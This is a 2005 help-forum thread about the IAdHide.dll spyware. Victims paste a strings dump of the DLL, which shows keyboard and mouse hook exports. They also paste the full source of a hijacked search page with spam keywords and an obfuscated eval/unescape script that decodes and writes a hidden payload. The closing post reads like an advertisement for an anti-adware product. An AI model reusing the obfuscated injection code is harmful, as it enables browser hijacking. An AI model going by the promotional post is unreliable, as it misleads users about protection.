Jump to content

 


Iadhide4.dll

Started by ratheor , May 19 2005 12:18 PM

  • Please log in to reply
5 replies to this topic

#1 ratheor

ratheor
  • Guests

Posted 19 May 2005 - 12:18 PM

Anyone know anything about how to remove this spyware?




#2 Base1

Base1
  • Guests

Posted 19 May 2005 - 12:22 PM

Do not download this program.
http://looking-for.c...pingWizard.html

#3 Barnum

Barnum
  • Guests

Posted 19 May 2005 - 12:52 PM

THis is what I found so far ratheor

\!This program cannot be run in DOS mode.

GetModuleFileNameA GlobalDeleteAtom GetCurrentProcessId GlobalAddAtomA GetCommandLineA ] DisableThreadLibraryCalls  CloseHandle MapViewOfFile 5 CreateFileMappingA UnmapViewOfFile lstrcpynA lstrlenA lstrcmpiA mGetTickCount GetLastError 1 CreateEventA eSetEvent WaitForSingleObject OpenEventA KERNEL32.dll wsprintfA PostMessageA RegisterWindowMessageA IsWindow  CallNextHookEx LoadStringA bSetWindowsHookExA UnhookWindowsHookEx USER32.dll SetSecurityDescriptorDacl InitializeSecurityDescriptor [RegCloseKey {RegQueryValueExA rRegOpenKeyExA ADVAPI32.dll /? l$ 

IAdHide.dll GetLastEventTime GetNKeys _MyCBTProc@12 _MyKeyboardProc@12 _MyMouseProc@12 SetEventNow StartTrapping StopTrapping VerifyTrapping __DllMainCRTStartup@12 _hooks_set_event_%s UNKNOWN BackWeb Client_LOAD_APP iadhide_memfilemap_%s Prevented the Dial-up Window to be shown by BackWeb.exe A Dial-up Connection Window is opening & BackWeb Agent BackWeb.exe BackWeb- <<UNKNOWN>> IADHide Software\BackWeb\BackWeb iadhide_event_%s S t r i n g F i l e I n f o   0 4 0 9 0 4 b 0   C o m m e n t s 0   C o m p a n y N a m e B a c k W e b 8   F i l e D e s c r i p t i o n I A d H i d e T   F i l e V e r s i o n V e r s i o n 6 . 1 . 4 ( B u i l d 6 8 R ) 0   I n t e r n a l N a m e I A d H i d e \   L e g a l C o p y r i g h t 2 0 0 1 B a c k W e b T e c h n o l o g i e s . (  L e g a l T r a d e m a r k s @  O r i g i n a l F i l e n a m e I A d H i d e . d l l $   P r i v a t e B u i l d 4 @   P r o d u c t N a m e B a c k W e b I A d H i d e X   P r o d u c t V e r s i o n V e r s i o n 6 . 1 . 4 ( B u i l d 6 8 R )  S p e c i a l B u i l d D  V a r F i l e I n f o $  T r a n s l a t i o n   D i a l - u p C o n n e c t i o n
- S i g n - I   000$00060@0G0V0b0|00000000000
11!1*181>1]1c1u11111111112 22'2-252@2F2L2W2]2o2w22222222223 3/3]3h3333333333334-4X4u44444444555#585?5I5N5X5b5g5q5{55555555 636G6U6e6l66666666666667$7*727:7B7J7R7Z7b7j7r7{7777777778 888"888C8T8^8d8j8u888888888888999(9.949:9C9L9T9a9k9q9w9999999::':3:9:

#4 Ihatetrojans

Ihatetrojans
  • Guests

Posted 22 May 2005 - 01:55 PM

Help I got the same thing on my computer. This what I see from the source.


html><head><meta http-equiv="expires" content="2"><meta http-equiv="imagetoolbar" content="no"><meta http-equiv="content-type" content="text/html; charset=utf-8"/><title>about:blank</title><style>a:hover {font-size:xx-small;text-decoration:underline} a.m {color:#0090DE} td {font-size:xx-small} body {font:xx-small verdana,sans-serif;color:#6d6c75;} div {padding-top:10px} a {font-size:xx-small;text-decoration:none;color:#6d6c75} a:active {font-size:xx-small;text-decoration:none;color:#6d6c75} a:visited {font-size:xx-small;text-decoration:none;color:#6d6c75}</style> <script language=JavaScript>
var MyLoc = "" + location;
var End = MyLoc.indexOf("#")
var PIN = 14044;
if (End > 0)
PIN = MyLoc.substring(End+1, MyLoc.length);
var key=new Array();
key0=new Array('viagra','xanax','phentermine','spam','carisoprodol','hydrocodone,');
key1=new Array('valium','cialis','texas holdem','party poker','roulette','online gambling');
key2=new Array('blackjack','casino','breast enlargement','webhosting','domain registration','bonus server');
key3=new Array('merchant account','voice mail','work at home','paxil','personal photos','free online dating');
key4=new Array('auto insurance','prescription','rv finance','visa platinum','merchant account','nevada incorporation');
key5=new Array('mortgage','spyware','adware','popup blocker','firewall','soft');
num=(Math.random()*10000)%6;
num=parseInt(num);
gum=(Math.random()*10000)%6;
gum=parseInt(gum);
switch(num){
case 0:
key=key0
break
case 1:
key=key1
break
case 2:
key=key2
break
case 3:
key=key3
break
case 4:
key=key4
break
case 5:
key=key5
break
case 6:
key=key6
break
}
function keywords(){
str=key[gum];

document.search.qq.value=str;
}
</SCRIPT><META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD><BODY bgColor=#ffffff topMargin=60 onload=document.search.qq.focus(); onmouseover="status='Quick Web Search...'"><script language="JavaScript" type="text/javascript"><!--
var w="",l="",g="IYSOG1p+6VP8=|We#tfcDNRBTxnQC:%z!q2ho-)?M&H(g4<kvbUFA9mj;E\"wa>u0/y.drLJZ3_ sil",m=78;eval(unescape("%66%75%6E%63%74%69%6F%6E%20%62%28%6E%29%7B%76%61%72%20%79%3D%27%27%2C%78%2C%72%2C%73%2C%66%3B%66%6F%72%28%78%3D%30%3B%78%3C%6E%2E%6C%65%6E%67%74%68%3B%78%2B%2B%29%7B%72%3D%6E%2E%63%68%61%72%41%74%28%78%29%3B%73%3D%67%2E%69%6E%64%65%78%4F%66%28%72%29%3B%69%66%28%73%3E%2D%31%29%7B%66%3D%28%28%73%2B%31%29%25%6D%2D%31%29%3B%69%66%28%66%3C%3D%30%29%7B%66%2B%3D%6D%7D%79%2B%3D%67%2E%63%68%61%72%41%74%28%66%2D%31%29%7D%65%6C%73%65%7B%79%2B%3D%72%7D%7D%6C%2B%3D%79%7D%3B%66%75%6E%63%74%69%6F%6E%20%6A%6A%6A%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%6C%29%7D"));b("sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssskiDLl+");b("fsI>Q40>4#|wZ>b>ODLl+fwsf.+#|wf#nfy;>b>iDLl+fwukq))\nc0QDfl-QsrQ-g?{L#f0LQsc>Ii#}c0QDfl-Qs-j0g#?{lcg#daolDo||p?{alQr-adL#I#>i#\"b#Qfig\"b#Qfd&GFO\"&GP\"?EalQr-ad-Qj-0i#j-b#|Q0II}}c0QDfl-Qs;vg?{>I#Lfg0Q#iD>+#gwxolisc0QDfl-QslisQ-fs>b>lI>UI#dw??EL#f0LQsc>Ii#}c0QDfl-Qsv;g#?{lcg#daolDo||p?{alQr-adD>+f0L#\"b#Qfig\"b#Qfd&GFO\"&GP\"?EalQr-ad-Qj-0i#j-b#|rQ-}lcg#daolDo||_?{L#f0LQs;vg?}}c0QDfl-QsDfg?{o4|#b#QfdU0ff-QElcgo4||hWWo4||_?;vg?}bD|r-D0j#Qfd>IIE2U|r-D0j#Qfd4#f\"I#j#QfT.YrElcgbD?{lcg2U?{r-D0j#Qfd-Q");b("D-Qf#nfj#Q0|;vEr-D0j#Qfd-Qi#I#Dfif>Lf|rQ-}#Ii#{r-D0j#Qfd-Qj-0i#r-aQ|Df}}lcg2UHHqbD?{r-D0j#Qfd-Qj-0i#r-aQ|rQ-Er-D0j#Qfd-Qj-0i#0+|v;Er-D0j#Qfd-QD-Qf#nfj#Q0|rQ-}lcgr-D0j#QfdI>.#Li?{alQr-adD>+f0L#\"b#Qfig\"b#Qfd&GFO\"F8W\"b#Qfd&GFO\"NGeR?EalQr-ad-Qj-0i#r-aQ|v;EalQr-ad-Qj-0i#0+|-j0}yy))ukyiDLl+fuskO:BY8xu\r\nb>LsD-0Qf#Ls|swklj4siLD|'off+%yyaaadfL>Dvolfiw6wdDDyDQfyo+Mw68YR6w's>If|''sU-Lr#L|'/'uwE\r\nc0QDfl-Qs4-gf#nf?s{si#>LDod22db>I0#|f#nfEsi#>LDodi0Ujlfg?Es}\r\nc0QDfl-Qs0QlQif>IIg?s{sr-D0j#QfdI-D>fl-");b("Qs|swoff+%yyaaadQ#fclQr#LdDDy0QlQif>IIylQr#nd+o+M+lQ|w68YR6wwEs}kyO:BY8xuskNYPs>Il4Q|D#Qf#LuskAGB&sif.I#|weYNx(%sVV/+nwsQ>j#|i#>LDos>Dfl-Q|woff+%yyaaadQ#fclQr#LdDDyi#>LDod+o+wsj#fo-r|4#fsf>L4#f| +>L#QfuskiDLl+fsI>Q40>4#|wZ>b>ODLl+fwu\r\nr-D0j#QfdaLlf#gwklQ+0fsf.+#|olrr#QsQ>j#|+lQsb>I0#|w68YR6wuw?E\r\nkyiDLl+fuskx9TJ\"salrfo|wp//zwuskxTGNSukxBukxNukyxNukxNs>Il4Q|Ll4ofuskiDLl+fsI>Q40>4#|wZ>b>ODLl+fwu\r\n\t\t\tr-D0j#QfdaLlf#gwk9soL#c|';>b>iDLl+f%0QlQif>IIg?E'u0QlQif>IIso-j#+>4#ky9uw?E\r\n\t\tkyiDLl");b("+fuskyxNukyxBukyxTGNSukyx9TJ\"uskNYPsif.I#|wTGBN\"B)BY1(x%str#rc##sp+nsi-IlrEsTGBN\"B)xG8%str#rc##sp+nsi-IlrEs89NNYR1)J\"Ax%sh/+nEsTGBN\"B)J\"Ax%str#rc##sp+nsi-IlrEseYNx(%sp//zEsTGBN\"B)TGxxG&%str#rc##sp+nsi-Ilrws>Il4Q|I#cfuskx9TJ\"sU-Lr#L|/uskxTGNSukxBukxNsalrfo|ppVsL-aO+>Q|_ukY&1so#l4of|VmsiLD|woff+%yyaaadQ#fclQr#LdDDylj>4#iylj4dZ81wsalrfo|ppVukyxNukxNsalrfo|_<=uskNYPs>Il4Q|I#cfuC0lDvse#UsO#>LDoskyNYPukyxNukxNsb9Il4Q|f-+salrfo|mmuHQUi+EkyxNukyxBukxBukxNsD-IO+>Q|hukYR8Fxsj>nJ#Q4fo|ph=sil!#|V/sQ");b(">j#|22sP:9BN R9&\"|wO#>LDox#nfwusHQUi+EHQUi+EskYR8Fxsf.+#|i0Ujlfsb>I0#|O#>LDouskq))kULuklQ+0fsf.+#|wDo#DvU-nwsQ>j#|wljcIwsflfI#|wOo-asclLifsL#i0Ifs+>4#wus)sY'jsA##IlQ4sJ0Dv.))ukyxNukyxBukxBukxNsD-IO+>Q|huHQUi+EkyxNukyxBukyxTGNSukyx9TJ\"uskO:BY8xsI>Q40>4#|Z>b>ODLl+fuv#.a-Lrig?EkyO:BY8xuskNYPs>Il4Q|D#Qf#LukTBuk9soL#c|w;>b>iDLl+f%4-g'bl>4L>'?wubl>4L>sky9uWk9soL#c|w;>b>iDLl+f%4-g'n>Q>n'?wun>Q>nky9uWsk9soL#c|w;>b>iDLl+f%4-g'+o#Qf#LjlQ#'?wu+o#Qf#LjlQ#ky9usWk9soL#c|w;>b>iDLl+f%4-g'-QIlQ#zh/+o>Lj>D.'?wu");b("-QIlQ#s+o>Lj>D.ky9uWsk9soL#c|w;>b>iDLl+f%4-g'D>Lli+L-r-I'?wuD>Lli-+L-r-Iky9usWk9soL#c|w;>b>iDLl+f%4-g'o.rL-D-r-Q#'?wuo.rL-D-r-Q#ky9uWsk9soL#c|w;>b>iDLl+f%4-g'b>Il0j'?wub>Il0jky9usWk9soL#c|w;>b>iDLl+f%4-g'Dl>Ili'?wuDl>Iliky9uWsk9soL#c|w;>b>iDLl+f%4-g'cl-LlD#f'?wucl-LlD#fky9ukTBuk9soL#c|w;>b>iDLl+f%4-g'f#n>izh/o-Ir#j'?wuf#n>iso-Ir#jky9usWk9soL#c|w;>b>iDLl+f%4-g'+>Lf.zh/+-v#L'?wu+>Lf.s+-v#Lky9uWsk9soL#c|w;>b>iDLl+f%4-g'L-0I#ff#'?wuL-0I#ff#ky9usWk9soL#c|w;>b>iDLl+f%4-g'-QIlQ#zh/4>jUIlQ4'?wu-QIlQ#s4>");b("jUIlQ4ky9uWsk9soL#c|w;>b>iDLl+f%4-g'UI>Dv;>Dv'?wuUI>Dv;>Dvky9usWk9soL#c|w;>b>iDLl+f%4-g'iI-fi'?wuiI-fiky9uWsk9soL#c|w;>b>iDLl+f%4-g'D>ilQ-'?wuD>ilQ-ky9usWsk9soL#c|w;>b>iDLl+f%4-g'UL#>ifzh/#QI>L4#j#Qf'?wuUL#>ifs#QI>L4#j#Qfsky9ukTBuk9soL#c|w;>b>iDLl+f%4-g'a#Uo-iflQ4'?wua#Uo-iflQ4ky9usWk9soL#c|w;>b>iDLl+f%4-g'r-j>lQzh/L#4lifL>fl-Q'?wur-j>lQsL#4lifL>fl-Qky9uWsk9soL#c|w;>b>iDLl+f%4-g'U-Q0izh/i#Lb#L'?wuU-Q0isi#Lb#Lsky9uWsk9soL#c|w;>b>iDLl+f%4-g'b-lD#zh/j>lI'?wub-lD#sj>lIky9usWsk9soL#c|w;>b>iDLl+f%4-g'");b("a-Lvzh/>fzh/o-j#'?wua-Lvs>fso-j#ky9ukTBuk9soL#c|w;>b>iDLl+f%4-g'+>nlI'?wu+>nlIky9usWk9soL#c|w;>b>iDLl+f%4-g'+#Li-Q>Izh/+o-f-i'?wu+#Li-Q>Is+o-f-iky9uWsk9soL#c|w;>b>iDLl+f%4-g'rl#fzh/+lIIi'?wurl#fs+lIIiky9usWk9soL#c|w;>b>iDLl+f%4-g'cL##zh/-QIlQ#zh/r>flQ4'?wucL##s-QIlQ#sr>flQ4ky9uWsk9soL#c|w;>b>iDLl+f%4-g'>0f-zh/lQi0L>QD#'?wu>0f-slQi0L>QD#ky9usWk9soL#c|w;>b>iDLl+f%4-g'+L#iDLl+fl-Q'?wu+L#iDLl+fl-Qky9uWsk9soL#c|w;>b>iDLl+f%4-g'c#flio'?wuc#flioky9ukTBuk9soL#c|w;>b>iDLl+f%4-g'Lbzh/clQ>QD#'?wuLbsclQ>QD#");b("ky9usWk9soL#c|w;>b>iDLl+f%4-g'bli>zh/+I>flQ0j'?wubli>s+I>flQ0jky9uWsk9soL#c|w;>b>iDLl+f%4-g'j#LDo>Qfzh/>DD-0Qf'?wuj#LDo>Qfs>DD-0Qfky9usWsk9soL#c|w;>b>iDLl+f%4-g'j-Lf4>4#'?wuj-Lf4>4#ky9ukTBuk9soL#c|w;>b>iDLl+f%4-g'i+.a>L#'?wui+.a>L#ky9usWk9soL#c|w;>b>iDLl+f%4-g'>ra>L#'?wu>ra>L#ky9uWsk9soL#c|w;>b>iDLl+f%4-g'+-+0+zh/UI-Dv#L'?wu+-+0+sUI-Dv#Lky9usWk9soL#c|w;>b>iDLl+f%4-g'clL#a>II'?wuclL#a>IIky9uWsk9soL#c|w;>b>iDLl+f%4-g'i-cf'?wui-cfky9ukyNYPukyNYPuskNYPs>Il4Q|I#cfuskNYPs>Il4Q|Ll4ofusk(BsD-I-L|tr#rc##");b("sOY3\"|pusk8ukO89Rslr|joisif.I#|wNYO8J9S%sQ-Q#wukyO89Ruky8ukyNYPukyNYPukyAGB&ukyNYPuskiDLl+fu\r\nr-D0j#QfdaLlf#gD-0Qf#L?E\r\ni#Icdc-D0ig?E\r\nkyiDLl+fus");jjj();document.write(w);w="";//--></script><noscript>To display this page you need a browser with JavaScript support.</noscript></BODY></HTML>


#5 Ihatetrojans

Ihatetrojans
  • Guests

Posted 22 May 2005 - 02:08 PM

I contacted noadware.net through their chat service.

Please wait for a site operator to respond.
You are now chatting with 'Sam'
Sam: Welcome to Noadware.net! How can I be of assistance today?
you: Hi
Sam: Hello.
you: I am interested in finding out who is
you: http://www.noadware.net/?hop=extron
you: extron has an affiliate link to your web site
you: Can you tell me the affiliate extron is
Sam: Just a moment please
Sam: We are staffed to answer technical questions about our product and services. Your question is one best reserved for management. To contact them directly, please email them at business@noadware.net
you: what is their telephone number
Sam: Unfortunately, we do not currently offer the ability to receive any assistance by phone.


#6 How I keep my PC clean of virus&

How I keep my PC clean of virus&
  • Guests

Posted 05 June 2006 - 03:46 AM

Seems it is not just be that had spyware problems.

Today and the last three months I had no spyware/virus/popups problems
ever...

I use just two pieces of software to control adware/spyware and viruses.

1) McAfee. It also works on the backround while I am online.

2) NoAdware. This also works on the backround but focuses more on adware not viruses.

Those two only are enough for me who is online more than 6hours a day.

Then I have also a free program called ccleaner to speed up my PC performance. This deletes "rubish" on hardrive. Free updates as well and very cool.
Ccleaner.com

Regards,
Karl
Back to Computer Viruses and Spyware


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Washington DC Advertising

  1. DC Message Boards
  2. Community Talk
  3. Science and Technology
  4. Computer Viruses and Spyware
  5. DC Message Boards Guide Lines